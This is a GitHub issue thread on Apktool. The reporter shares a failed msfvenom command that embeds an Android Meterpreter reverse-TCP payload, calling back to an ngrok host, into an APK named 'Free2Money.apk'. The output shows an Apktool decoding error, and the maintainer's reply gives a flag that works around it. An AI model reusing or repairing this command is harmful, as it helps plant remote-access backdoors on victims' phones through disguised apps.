### ISSUE TITLE
[BUG] apktool execution failed

### ISSUE THREAD

**Issue by et4soft** [iBotPeaches/Apktool#2833]
how can fix it ☹️

![Screenshot at 2022-06-14 10-25-53](https://user-images.githubusercontent.com/103843688/173531672-85613f2e-f01f-46e1-a29f-b1f1aa28be17.png)

Full problem 

````
sudo msfvenom -x fckg.apk -p android/meterpreter/reverse_tcp lhost=7.tcp.eu.ngrok.io lport=3080 -o /home/osiris/Desktop/Free2Money.apk
[sudo] password for osiris: 
Using APK template: fckg.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[-] I: Using Apktool 2.6.1 on original.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /root/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Baksmaling classes2.dex...
I: Baksmaling classes3.dex...
I: Baksmaling classes4.dex...
I: Baksmaling classes5.dex...
I: Baksmaling classes6.dex...
I: Baksmaling assets/39285EFA.dex...
Exception in thread "main" org.jf.dexlib2.dexbacked.DexBackedDexFile$NotADexFile: Not a valid dex magic value: cf 77 4c c7 9b 21 01 cd
	at org.jf.dexlib2.util.DexUtil.verifyDexHeader(DexUtil.java:93)
	at org.jf.dexlib2.dexbacked.DexBackedDexFile.getVersion(DexBackedDexFile.java:157)
	at org.jf.dexlib2.dexbacked.DexBackedDexFile.<init>(DexBackedDexFile.java:81)
	at org.jf.dexlib2.dexbacked.DexBackedDexFile.<init>(DexBackedDexFile.java:184)
	at org.jf.dexlib2.dexbacked.ZipDexContainer$1.getDexFile(ZipDexContainer.java:181)
	at brut.androlib.src.SmaliDecoder.decode(SmaliDecoder.java:89)
	at brut.androlib.src.SmaliDecoder.decode(SmaliDecoder.java:37)
	at brut.androlib.Androlib.decodeSourcesSmali(Androlib.java:99)
	at brut.androlib.ApkDecoder.decode(ApkDecoder.java:151)
	at brut.apktool.Main.cmdDecode(Main.java:175)
	at brut.apktool.Main.main(Main.java:79)
Error: apktool execution failed
```

**Comment by iBotPeaches** [comment]
Must not be a valid dex file. There is a command `--only-main-classes` to ignore disassembling those dex files not found in the root.

Closing.
